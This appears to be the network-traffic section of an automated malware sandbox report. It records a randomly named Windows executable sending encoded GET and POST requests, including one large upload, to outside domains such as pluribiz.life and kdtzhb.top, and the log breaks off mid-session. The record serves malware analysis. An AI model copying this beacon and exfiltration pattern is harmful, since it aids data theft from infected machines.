                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Dw6JfoNMZUCmBAaWO3YQb9Xf3rukE2+VpVrANl90G8AGw/xLUOXRNaKO9cwek6kplwMJ5tKtrTwKs+p1qQGBrw==
                                                                          set-cookie: parking_session=290819f2-0e0f-46e6-87db-617d26f0bb5c; expires=Tue, 12 Nov 2024 08:07:58 GMT; path=/
                                                                          connection: close
                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 77 36 4a 66 6f 4e 4d 5a 55 43 6d 42 41 61 57 4f 33 59 51 62 39 58 66 33 72 75 6b 45 32 2b 56 70 56 72 41 4e 6c 39 30 47 38 41 47 77 2f 78 4c 55 4f 58 52 4e 61 4b 4f 39 63 77 65 6b 36 6b 70 6c 77 4d 4a 35 74 4b 74 72 54 77 4b 73 2b 70 31 71 51 47 42 72 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Dw6JfoNMZUCmBAaWO3YQb9Xf3rukE2+VpVrANl90G8AGw/xLUOXRNaKO9cwek6kplwMJ5tKtrTwKs+p1qQGBrw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                          Nov 12, 2024 08:52:58.297287941 CET571INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjkwODE5ZjItMGUwZi00NmU2LTg3ZGItNjE3ZDI2ZjBiYjVjIiwicGFnZV90aW1lIjoxNzMxMzk3OT


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          12192.168.2.449868199.59.243.227802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:53:00.223387957 CET372OUTGET /d26j/?L2m0Zn=yTdTvK6nwd7fLzOcZ1KS4TBFSWEE7xEBFi4nbiSuwNVJLrY4NtXgfJKYD2NhiKrdBAMHfcdZvgkmH1tO/OhN3l8PVEl0DEVtj8ozSBQBBAVHa7hfB74pOyU=&JPc=NBQdBBkPWTStX HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Connection: close
                                                                          Host: www.vnxoso88.art
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Nov 12, 2024 08:53:00.876884937 CET1236INHTTP/1.1 200 OK
                                                                          date: Tue, 12 Nov 2024 07:52:59 GMT
                                                                          content-type: text/html; charset=utf-8
                                                                          content-length: 1470
                                                                          x-request-id: a14d32a3-a253-4d42-bedc-0fd7e5fd5114
                                                                          cache-control: no-store, max-age=0
                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                          vary: sec-ch-prefers-color-scheme
                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Loc/T6r1UcTGwyVOCrvN0Q86hIXdcaV8ZeB2Nyf0aiJZy4LNkQxJcPo/herPlCc4LR3m6/pcFkYXPG0ZXYGBfw==
                                                                          set-cookie: parking_session=a14d32a3-a253-4d42-bedc-0fd7e5fd5114; expires=Tue, 12 Nov 2024 08:08:00 GMT; path=/
                                                                          connection: close
                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4c 6f 63 2f 54 36 72 31 55 63 54 47 77 79 56 4f 43 72 76 4e 30 51 38 36 68 49 58 64 63 61 56 38 5a 65 42 32 4e 79 66 30 61 69 4a 5a 79 34 4c 4e 6b 51 78 4a 63 50 6f 2f 68 65 72 50 6c 43 63 34 4c 52 33 6d 36 2f 70 63 46 6b 59 58 50 47 30 5a 58 59 47 42 66 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Loc/T6r1UcTGwyVOCrvN0Q86hIXdcaV8ZeB2Nyf0aiJZy4LNkQxJcPo/herPlCc4LR3m6/pcFkYXPG0ZXYGBfw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                          Nov 12, 2024 08:53:00.876898050 CET923INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTE0ZDMyYTMtYTI1My00ZDQyLWJlZGMtMGZkN2U1ZmQ1MTE0IiwicGFnZV90aW1lIjoxNzMxMzk3OT


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          13192.168.2.449897209.74.64.58802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:53:05.922686100 CET634OUTPOST /afcr/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 203
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.pluribiz.life
                                                                          Origin: http://www.pluribiz.life
                                                                          Referer: http://www.pluribiz.life/afcr/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 6b 7a 38 48 43 47 6a 41 57 74 6f 43 58 46 37 31 71 64 76 37 6b 45 47 48 5a 6e 70 57 48 61 34 4e 35 52 77 36 6e 31 49 57 53 6f 33 6c 79 6d 4f 6e 77 2f 74 61 36 78 30 57 4f 65 47 75 54 43 4b 75 79 76 44 2f 69 64 77 33 30 6e 46 56 69 6d 4a 71 6e 35 72 59 4b 42 50 76 30 69 6c 46 48 65 55 2f 37 62 47 41 6c 32 70 2f 4b 75 70 34 37 42 4b 36 79 78 70 76 69 33 54 64 78 48 4a 30 71 61 37 64 79 56 31 37 31 37 68 36 49 78 50 37 45 56 6f 2b 34 4c 6c 4d 35 74 35 75 59 6e 48 6b 56 6b 67 39 66 77 2b 4a 6e 66 6a 73 6d 49 2b 42 47 37 65 6d 71 4f 6d 4f 59 69 54 74 53 79 57 4b 51 2b 35 55 6c 77 3d 3d
                                                                          Data Ascii: L2m0Zn=kz8HCGjAWtoCXF71qdv7kEGHZnpWHa4N5Rw6n1IWSo3lymOnw/ta6x0WOeGuTCKuyvD/idw30nFVimJqn5rYKBPv0ilFHeU/7bGAl2p/Kup47BK6yxpvi3TdxHJ0qa7dyV1717h6IxP7EVo+4LlM5t5uYnHkVkg9fw+JnfjsmI+BG7emqOmOYiTtSyWKQ+5Ulw==
                                                                          Nov 12, 2024 08:53:06.577081919 CET533INHTTP/1.1 404 Not Found
                                                                          Date: Tue, 12 Nov 2024 07:53:06 GMT
                                                                          Server: Apache
                                                                          Content-Length: 389
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          14192.168.2.449912209.74.64.58802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:53:08.462522030 CET654OUTPOST /afcr/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 223
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.pluribiz.life
                                                                          Origin: http://www.pluribiz.life
                                                                          Referer: http://www.pluribiz.life/afcr/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 6b 7a 38 48 43 47 6a 41 57 74 6f 43 57 6d 6a 31 70 37 6e 37 31 6b 47 45 46 33 70 57 4f 36 34 4a 35 52 4d 36 6e 30 4d 47 53 37 66 6c 79 43 4b 6e 7a 36 42 61 33 52 30 57 61 4f 47 76 4c 69 4b 70 79 76 4f 4b 69 59 49 33 30 6e 52 56 69 69 4e 71 6e 49 72 66 49 52 50 68 37 43 6b 6a 4b 2b 55 2f 37 62 47 41 6c 77 46 52 4b 75 78 34 36 78 36 36 79 54 4e 73 38 6e 54 53 34 6e 4a 30 75 61 37 52 79 56 30 63 31 2b 64 63 49 33 4c 37 45 58 67 2b 34 5a 64 4e 7a 74 34 6e 47 58 48 79 64 6e 42 78 57 56 54 4a 6f 38 50 54 70 72 47 4c 4f 64 54 38 37 2f 48 5a 4b 69 33 65 50 31 66 2b 64 39 45 64 2b 38 6e 2b 55 74 39 71 30 5a 70 53 62 48 48 64 53 4a 35 68 30 70 30 3d
                                                                          Data Ascii: L2m0Zn=kz8HCGjAWtoCWmj1p7n71kGEF3pWO64J5RM6n0MGS7flyCKnz6Ba3R0WaOGvLiKpyvOKiYI30nRViiNqnIrfIRPh7CkjK+U/7bGAlwFRKux46x66yTNs8nTS4nJ0ua7RyV0c1+dcI3L7EXg+4ZdNzt4nGXHydnBxWVTJo8PTprGLOdT87/HZKi3eP1f+d9Ed+8n+Ut9q0ZpSbHHdSJ5h0p0=
                                                                          Nov 12, 2024 08:53:09.133166075 CET533INHTTP/1.1 404 Not Found
                                                                          Date: Tue, 12 Nov 2024 07:53:09 GMT
                                                                          Server: Apache
                                                                          Content-Length: 389
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          15192.168.2.449927209.74.64.58802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:53:11.014210939 CET10736OUTPOST /afcr/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 10303
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.pluribiz.life
                                                                          Origin: http://www.pluribiz.life
                                                                          Referer: http://www.pluribiz.life/afcr/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 6b 7a 38 48 43 47 6a 41 57 74 6f 43 57 6d 6a 31 70 37 6e 37 31 6b 47 45 46 33 70 57 4f 36 34 4a 35 52 4d 36 6e 30 4d 47 53 39 48 6c 79 52 43 6e 70 64 56 61 32 52 30 57 5a 4f 47 69 4c 69 4c 31 79 72 69 52 69 59 4e 49 30 6c 70 56 7a 78 46 71 68 38 2f 66 43 52 50 68 2b 79 6b 33 48 65 55 71 37 62 32 45 6c 77 31 52 4b 75 78 34 36 33 2b 36 69 52 70 73 2b 6e 54 64 78 48 49 37 71 61 36 4f 79 56 74 6a 31 2f 4e 71 49 48 72 37 45 33 77 2b 36 71 6c 4e 2f 74 34 70 48 58 47 78 64 6e 4d 7a 57 52 7a 2f 6f 39 37 35 70 73 6d 4c 4c 38 6d 39 75 39 62 2b 54 68 48 6c 54 32 4c 4b 59 73 78 66 2b 4d 33 44 53 64 4a 6a 6e 4b 70 34 41 55 79 46 4b 59 56 31 32 4f 33 2b 4f 62 2b 53 32 55 4f 2f 63 57 69 68 36 45 5a 35 69 33 66 7a 6d 49 79 44 4f 65 45 52 2f 6e 35 30 4b 43 4c 52 66 53 67 2f 43 4f 71 57 54 61 49 66 73 46 37 57 7a 49 4e 4e 4c 55 31 78 59 68 77 64 4a 35 46 4f 2b 38 2f 52 7a 53 6a 32 64 5a 38 7a 42 43 52 32 66 69 62 50 62 50 4f 78 35 6c 2f 4e 43 75 68 64 5a 6b 2b 4a 53 51 78 6c 39 78 68 7a 31 73 78 [TRUNCATED]
                                                                          Data Ascii: L2m0Zn=kz8HCGjAWtoCWmj1p7n71kGEF3pWO64J5RM6n0MGS9HlyRCnpdVa2R0WZOGiLiL1yriRiYNI0lpVzxFqh8/fCRPh+yk3HeUq7b2Elw1RKux463+6iRps+nTdxHI7qa6OyVtj1/NqIHr7E3w+6qlN/t4pHXGxdnMzWRz/o975psmLL8m9u9b+ThHlT2LKYsxf+M3DSdJjnKp4AUyFKYV12O3+Ob+S2UO/cWih6EZ5i3fzmIyDOeER/n50KCLRfSg/COqWTaIfsF7WzINNLU1xYhwdJ5FO+8/RzSj2dZ8zBCR2fibPbPOx5l/NCuhdZk+JSQxl9xhz1sxe/XOLErW9mmqc7SbFCdhdImy0H1Q8MZsP2A3EbyEpu1Bs1wYb0RfdyA6baUtf57zwsdO9BVMyh6pCd10cwzmcg1cPtHG5v1sKY6d0BAsgx+y4fMO4yda7fVgG5fEVtbZud7nlDm2+zydBR2mGkLGhcF4kaGrM2RwapvArAUJoRK9qsLywK0vhgnekpREWpNXUiIi3g0yoNI97p7F2pVbr9/DeKY82+6+oB1P535A/iaHbFPoDdyygZlkF5cLiDS5i3psgBia4SNTslZX61Xt/GzV6a1PgER4Z/8jHW+JxndiCcUKFND8NIX+TnY/FjpTlqKuUMGbDy847M9H3synqkHkoEtC65lXEi27kqUoQb5LYd/ZqmHlZ6IHrTji1hrqUPNtymjNT1fE3zPZhoJHAdhFhsumo7GTaPVKSum1196pbc/hGn1nDty67gf02Gg70xW6CqbiMbsvUT/juOKjVEAN2eYnwlMpUUzqArH7zX8UhTjuDa08daJwtJH3LNksSsxnV1M2mijmq4knZs1nNGf5bwndCVE407yjl56urLsG47a6+e4GegJmI6tKF8cPnP2t3gRl5bNLqRa5YanHKxvrym5WoE5RqGYTBQ5+xRvKq9hEqjDJuKGFJFbQp3e3QDdUPUXVxt9jZRBjBxAlnDRKrlCikfEXG8 [TRUNCATED]
                                                                          Nov 12, 2024 08:53:11.954678059 CET533INHTTP/1.1 404 Not Found
                                                                          Date: Tue, 12 Nov 2024 07:53:11 GMT
                                                                          Server: Apache
                                                                          Content-Length: 389
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          16192.168.2.449943209.74.64.58802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:53:13.557502031 CET373OUTGET /afcr/?L2m0Zn=pxUnB3/JQIgHT0Xo3IWq6WCCUHVXBaIMoApNpkZ5FdrdhyTQr+Z8vQ44Z+GGNzyuoe7kishsw1Bs9wd8tp/8ABar8QBPLOAn7b24mX56Fs9L7gSNzzZg1Hk=&JPc=NBQdBBkPWTStX HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Connection: close
                                                                          Host: www.pluribiz.life
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Nov 12, 2024 08:53:14.226073980 CET548INHTTP/1.1 404 Not Found
                                                                          Date: Tue, 12 Nov 2024 07:53:14 GMT
                                                                          Server: Apache
                                                                          Content-Length: 389
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          17192.168.2.44997947.242.89.146802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:53:19.608899117 CET625OUTPOST /1iqa/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 203
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.kdtzhb.top
                                                                          Origin: http://www.kdtzhb.top
                                                                          Referer: http://www.kdtzhb.top/1iqa/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
